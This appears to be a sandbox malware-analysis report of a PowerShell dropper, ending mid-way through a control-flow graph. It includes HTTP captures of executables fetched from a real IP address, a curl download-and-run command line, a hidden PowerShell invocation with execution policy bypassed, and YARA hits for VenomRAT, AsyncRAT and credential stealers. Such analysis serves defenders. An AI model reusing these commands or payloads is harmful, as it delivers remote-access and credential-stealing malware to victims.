                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-msdos-program
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 38 bc c7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{8"0 @ `O H.text `.rsrc@@.reloc@BHD"h0ss(oooooi(oiiYii(oio ,o,o,o*(t0(((o*(*0rpss o!rsp~(o"&o!rs
                                                                    Jan 1, 2025 08:48:04.092267990 CET1236INData Raw: 70 7e 01 00 00 04 28 02 00 00 06 6f 22 00 00 0a 26 07 17 6f 23 00 00 0a 07 17 8d 22 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 24 00 00 0a 6f 25 00 00 0a 72 3a 74 00 70 7e 01 00 00 04 28 02 00 00 06 6f 26 00 00 0a 72 94 74 00 70 7e 01
                                                                    Data Ascii: p~(o"&o#"%~(o$o%r:tp~(o&rtp~(o'o(&*(*(*(*(*j(rtp(o*BSJBv4.0.30319l#~,P#Strings|(u#US~
                                                                    Jan 1, 2025 08:48:04.092278957 CET448INData Raw: 00 42 69 74 56 65 63 74 6f 72 33 32 00 67 32 00 70 32 00 43 6f 6e 73 6f 6c 65 41 70 70 31 36 37 00 67 65 74 5f 55 54 46 38 00 3c 4d 6f 64 75 6c 65 3e 00 73 65 74 5f 49 56 00 6d 73 63 6f 72 6c 69 62 00 41 64 64 00 53 79 73 74 65 6d 2e 43 6f 6c 6c
                                                                    Data Ascii: BitVector32g2p2ConsoleApp167get_UTF8<Module>set_IVmscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceset_ModePaddingModeCipherModeInvokeIDisposableSystem.Net.MimeGetTypeSystem.CoreMethodBaseDispose
                                                                    Jan 1, 2025 08:48:04.092333078 CET1236INData Raw: 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f 6e 73 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 70
                                                                    Data Ascii: tionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteMercado.exeNtilgset_PaddingEncodingSystem.Runtime.VersioningFromBase64StringGet
                                                                    Jan 1, 2025 08:48:04.092344046 CET1236INData Raw: 00 4a 00 51 00 54 00 49 00 45 00 68 00 64 00 48 00 4c 00 50 00 61 00 57 00 63 00 71 00 42 00 67 00 38 00 50 00 48 00 51 00 4b 00 4e 00 77 00 4f 00 63 00 4c 00 56 00 55 00 76 00 32 00 6b 00 35 00 6a 00 34 00 4b 00 75 00 38 00 68 00 6b 00 57 00 75
                                                                    Data Ascii: JQTIEhdHLPaWcqBg8PHQKNwOcLVUv2k5j4Ku8hkWuPRtH1xgQTMEn/YS520LKi9lkvuP3DgoW/KHiv87WKblJrzm4b4ydOaw1C+SGJNgjfVCVguKO/8Ts+Y07
                                                                    Jan 1, 2025 08:48:04.092363119 CET1236INData Raw: 00 39 00 32 00 75 00 66 00 35 00 56 00 53 00 37 00 4d 00 32 00 66 00 6e 00 34 00 6e 00 72 00 32 00 61 00 77 00 77 00 42 00 66 00 63 00 58 00 5a 00 56 00 76 00 4a 00 7a 00 32 00 65 00 45 00 55 00 52 00 4a 00 4f 00 30 00 70 00 50 00 4f 00 62 00 49
                                                                    Data Ascii: 92uf5VS7M2fn4nr2awwBfcXZVvJz2eEURJO0pPObI8FZt0+99ImCmgXpRqdCvwQaPNXsyeVtI9GI+gN3tUIjIsPjT0yGGNPkSuux5i5/NXYWgXS4u3meDaq9q
                                                                    Jan 1, 2025 08:48:04.092375040 CET1236INData Raw: 00 78 00 31 00 58 00 56 00 75 00 67 00 37 00 7a 00 6d 00 38 00 4d 00 4d 00 49 00 79 00 6e 00 32 00 56 00 4c 00 56 00 4f 00 76 00 74 00 71 00 67 00 69 00 6c 00 61 00 31 00 45 00 73 00 35 00 6e 00 63 00 7a 00 76 00 6c 00 78 00 6f 00 31 00 68 00 70
                                                                    Data Ascii: x1XVug7zm8MMIyn2VLVOvtqgila1Es5nczvlxo1hplLalhLP7PNXvzqJV73kbh+IeJ8hXQ0ntzzMENOINdttjodC2++Dv3r9GZilwY0gC1uM05zdUgoLmZE/D
                                                                    Jan 1, 2025 08:48:04.092612982 CET328INData Raw: 00 41 00 4c 00 69 00 58 00 38 00 6f 00 75 00 6b 00 2b 00 52 00 37 00 43 00 34 00 4d 00 43 00 4f 00 55 00 6f 00 4c 00 54 00 57 00 57 00 49 00 73 00 2b 00 39 00 6c 00 37 00 72 00 73 00 30 00 2f 00 42 00 6f 00 42 00 6f 00 56 00 49 00 78 00 6b 00 57
                                                                    Data Ascii: ALiX8ouk+R7C4MCOUoLTWWIs+9l7rs0/BoBoVIxkWnKqzDv7qG4jcRCIhVYG/4JLpUkZL7sl6Ltdb9RFrbmAFIRG95EYudOqjJxMbpTr4BCeshCgsPYHfjDOi
                                                                    Jan 1, 2025 08:48:04.092623949 CET1236INData Raw: 00 4f 00 71 00 6a 00 48 00 2b 00 61 00 56 00 36 00 77 00 30 00 4a 00 35 00 4e 00 69 00 33 00 72 00 71 00 4c 00 5a 00 4e 00 73 00 44 00 79 00 4a 00 4f 00 33 00 45 00 37 00 4a 00 6a 00 6e 00 6c 00 71 00 59 00 64 00 4e 00 6f 00 6b 00 32 00 39 00 34
                                                                    Data Ascii: OqjH+aV6w0J5Ni3rqLZNsDyJO3E7JjnlqYdNok294My1aocc5Y0GBGEpdfNDWmLJe4r88zW+po6tIu7hdGUPkALmvwl2VqNqxj4s0+BPHNfUGV7QdwTJ9MfiQ
                                                                    Jan 1, 2025 08:48:04.092634916 CET1236INData Raw: 00 43 00 64 00 6e 00 56 00 6c 00 2b 00 4d 00 6f 00 6a 00 64 00 62 00 33 00 6a 00 61 00 53 00 4a 00 34 00 31 00 32 00 72 00 4d 00 59 00 47 00 47 00 63 00 37 00 62 00 46 00 64 00 59 00 49 00 68 00 65 00 32 00 50 00 44 00 55 00 6b 00 6c 00 68 00 54
                                                                    Data Ascii: CdnVl+Mojdb3jaSJ412rMYGGc7bFdYIhe2PDUklhTXHyU4Y8fgHAzViUPnYGN5lWOec0gqf27qQGVZgcnMUVFi/040anqgw1N33w83v8KwPWjvM4wFVFexNVS
                                                                    Jan 1, 2025 08:48:04.097613096 CET1236INData Raw: 00 6a 00 45 00 4d 00 55 00 79 00 4b 00 37 00 75 00 72 00 49 00 41 00 75 00 35 00 57 00 69 00 69 00 6e 00 64 00 52 00 4a 00 31 00 53 00 37 00 70 00 66 00 70 00 61 00 7a 00 76 00 4e 00 37 00 51 00 4c 00 74 00 32 00 64 00 49 00 69 00 43 00 6b 00 61
                                                                    Data Ascii: jEMUyK7urIAu5WiindRJ1S7pfpazvN7QLt2dIiCkaaVR+xTPzZwpjKLu6OncqJGHGWSKQ13q7OT+J1L2mVkjOh8Q12isaj/O0LHnIJrtuhGP5rcpUlQz4swSd
                                                                    Jan 1, 2025 08:48:05.067584991 CET157OUTGET /infopage/yijth.exe HTTP/1.1
                                                                    X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                    Host: 147.45.44.131
                                                                    Jan 1, 2025 08:48:05.249610901 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 01 Jan 2025 07:48:05 GMT
                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                    Last-Modified: Sat, 28 Dec 2024 19:34:32 GMT
                                                                    ETag: "2fdc00-62a59ab2b1730"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 3136512
                                                                    Content-Type: application/x-msdos-program
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 be e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 e8 2f 00 4b 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf\g// 0@ @0@p/K0 0 H.text/ / `.rsrc0/@@.reloc 0/@B/HXG<4#Vwd!HAZI1YT8Dc[2njlOs]yx<mt8*B-rIg:mej{Um79;$QWAA0V0yh`4bE=WM&,C:])#lAG8B3O);"L"p<19;YF 8fK?WEw:7i(}jY2]u{1Crh:bvJn5)catiS/r68XNd/xeN[>F$y'E}+iG<


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:02:47:56
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1"
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:02:47:56
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:02:48:00
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
                                                                    Imagebase:0x7ff69fbc0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:02:48:00
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
                                                                    Imagebase:0x7ff69fbc0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:02:48:00
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:02:48:00
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\curl.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
                                                                    Imagebase:0x7ff68f4b0000
                                                                    File size:530'944 bytes
                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:02:48:03
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline"
                                                                    Imagebase:0x7ff74c510000
                                                                    File size:2'759'232 bytes
                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:02:48:03
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3454.tmp" "c:\Users\user\AppData\Local\Temp\03bjtjx4\CSCBF3C1B7A512F4AE098C09161EC8504E.TMP"
                                                                    Imagebase:0x7ff699d80000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:02:48:06
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    Imagebase:0xb60000
                                                                    File size:65'440 bytes
                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000008.00000002.4131974339.000000000318B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Reset < >
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1727994167.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                      • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                      • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                      • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728302162.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b970000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72b25b832ae389755989c5dba8ae4bea156cba0e495805a98b865fd7c87ee539
                                                                      • Instruction ID: 3c602c8ba4b88d4a25e2acfa19ab4f13a1bd8957c77795e84265313f335b4097
                                                                      • Opcode Fuzzy Hash: 72b25b832ae389755989c5dba8ae4bea156cba0e495805a98b865fd7c87ee539
                                                                      • Instruction Fuzzy Hash: 77E09A23F1E92D1EEBA1EA9C28B81F8A3C1DF94A21B0902B7E91CC3195EE0098104281

                                                                      Execution Graph

                                                                      Execution Coverage:3.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:3
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 12029 7ffd9b8bc809 12030 7ffd9b8bc80f CreateFileW 12029->12030 12032 7ffd9b8bc8de 12030->12032

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ffd9b8b5f80-7ffd9b8bb5c0 4 7ffd9b8bb5cc-7ffd9b8bb603 0->4 5 7ffd9b8bb5c2-7ffd9b8bb5c7 call 7ffd9b8b5fe0 0->5 8 7ffd9b8bb609-7ffd9b8bb614 4->8 9 7ffd9b8bb7f4-7ffd9b8bb809 4->9 5->4 10 7ffd9b8bb616-7ffd9b8bb61e 8->10 11 7ffd9b8bb682-7ffd9b8bb687 8->11 17 7ffd9b8bb80b-7ffd9b8bb812 9->17 18 7ffd9b8bb813-7ffd9b8bb85e 9->18 10->9 13 7ffd9b8bb624-7ffd9b8bb639 10->13 14 7ffd9b8bb689-7ffd9b8bb695 11->14 15 7ffd9b8bb6f3-7ffd9b8bb6fd 11->15 21 7ffd9b8bb63b-7ffd9b8bb660 13->21 22 7ffd9b8bb662-7ffd9b8bb66d 13->22 14->9 16 7ffd9b8bb69b-7ffd9b8bb6ae 14->16 19 7ffd9b8bb71f-7ffd9b8bb727 15->19 20 7ffd9b8bb6ff-7ffd9b8bb71d call 7ffd9b8b6000 15->20 23 7ffd9b8bb72a-7ffd9b8bb735 16->23 17->18 41 7ffd9b8bb87b-7ffd9b8bb88c 18->41 42 7ffd9b8bb860-7ffd9b8bb866 18->42 19->23 20->19 21->22 29 7ffd9b8bb6b0-7ffd9b8bb6b3 21->29 22->9 25 7ffd9b8bb673-7ffd9b8bb680 22->25 23->9 26 7ffd9b8bb73b-7ffd9b8bb756 23->26 25->10 25->11 26->9 30 7ffd9b8bb75c-7ffd9b8bb76f 26->30 31 7ffd9b8bb6b5 29->31 32 7ffd9b8bb6bf-7ffd9b8bb6c7 29->32 30->9 35 7ffd9b8bb775-7ffd9b8bb786 30->35 31->32 32->9 36 7ffd9b8bb6cd-7ffd9b8bb6f2 32->36 35->9 43 7ffd9b8bb788-7ffd9b8bb797 35->43 46 7ffd9b8bb88e-7ffd9b8bb899 41->46 47 7ffd9b8bb89d-7ffd9b8bb8c0 41->47 44 7ffd9b8bb868-7ffd9b8bb879 42->44 45 7ffd9b8bb8c1-7ffd9b8bb93a 42->45 48 7ffd9b8bb799-7ffd9b8bb7a4 43->48 49 7ffd9b8bb7e2-7ffd9b8bb7f3 43->49 44->41 44->42 61 7ffd9b8bb93c-7ffd9b8bb94c 45->61 62 7ffd9b8bb94e-7ffd9b8bb9a1 45->62 48->49 56 7ffd9b8bb7a6-7ffd9b8bb7dd call 7ffd9b8b6000 48->56 56->49 61->61 61->62 70 7ffd9b8bb9f7-7ffd9b8bb9fe 62->70 71 7ffd9b8bb9a3-7ffd9b8bb9a9 62->71 73 7ffd9b8bba00-7ffd9b8bba01 70->73 74 7ffd9b8bba3f-7ffd9b8bba68 70->74 71->70 72 7ffd9b8bb9ab-7ffd9b8bb9ac 71->72 75 7ffd9b8bb9af-7ffd9b8bb9b2 72->75 76 7ffd9b8bba04-7ffd9b8bba07 73->76 78 7ffd9b8bb9b8-7ffd9b8bb9c8 75->78 79 7ffd9b8bba69-7ffd9b8bbb25 75->79 76->79 80 7ffd9b8bba09-7ffd9b8bba1a 76->80 81 7ffd9b8bb9ca-7ffd9b8bb9ec 78->81 82 7ffd9b8bb9f0-7ffd9b8bb9f5 78->82 95 7ffd9b8bbb27 79->95 96 7ffd9b8bbb29-7ffd9b8bbb32 79->96 83 7ffd9b8bba36-7ffd9b8bba3d 80->83 84 7ffd9b8bba1c-7ffd9b8bba22 80->84 81->82 82->70 82->75 83->74 83->76 84->79 88 7ffd9b8bba24-7ffd9b8bba32 84->88 88->83 95->96 97 7ffd9b8bbb3b-7ffd9b8bbb3f 96->97 98 7ffd9b8bbb34-7ffd9b8bbb39 96->98 99 7ffd9b8bbb42-7ffd9b8bbba5 97->99 98->99 104 7ffd9b8bbba7 99->104 105 7ffd9b8bbba9-7ffd9b8bbc1f call 7ffd9b8b4620 99->105 104->105 114 7ffd9b8bbc23-7ffd9b8bbc2c 105->114 115 7ffd9b8bbc21 105->115 116 7ffd9b8bbc35-7ffd9b8bbc39 114->116 117 7ffd9b8bbc2e-7ffd9b8bbc33 114->117 115->114 118 7ffd9b8bbc3c-7ffd9b8bbc7a 116->118 117->118 122 7ffd9b8bbc7c 118->122 123 7ffd9b8bbc7e-7ffd9b8bbc87 118->123 122->123 124 7ffd9b8bbc89-7ffd9b8bbc8e 123->124 125 7ffd9b8bbc90-7ffd9b8bbc94 123->125 126 7ffd9b8bbc97-7ffd9b8bbd03 124->126 125->126 132 7ffd9b8bbd07-7ffd9b8bbd3d 126->132 133 7ffd9b8bbd05 126->133 137 7ffd9b8bbd3f 132->137 138 7ffd9b8bbd41-7ffd9b8bbd58 132->138 133->132 137->138 140 7ffd9b8bbd5c-7ffd9b8bbd65 138->140 141 7ffd9b8bbd5a 138->141 142 7ffd9b8bbd67 140->142 143 7ffd9b8bbd69-7ffd9b8bbd7d 140->143 141->140 142->143 145 7ffd9b8bbd7f 143->145 146 7ffd9b8bbd81-7ffd9b8bbdb6 143->146 145->146 150 7ffd9b8bbdb8-7ffd9b8bbdba 146->150 151 7ffd9b8bbdbc-7ffd9b8bbdd5 146->151 152 7ffd9b8bbdd7-7ffd9b8bbddd 150->152 151->152 154 7ffd9b8bbddf 152->154 155 7ffd9b8bbde1-7ffd9b8bbde5 152->155 154->155 156 7ffd9b8bbdeb-7ffd9b8bbe5c call 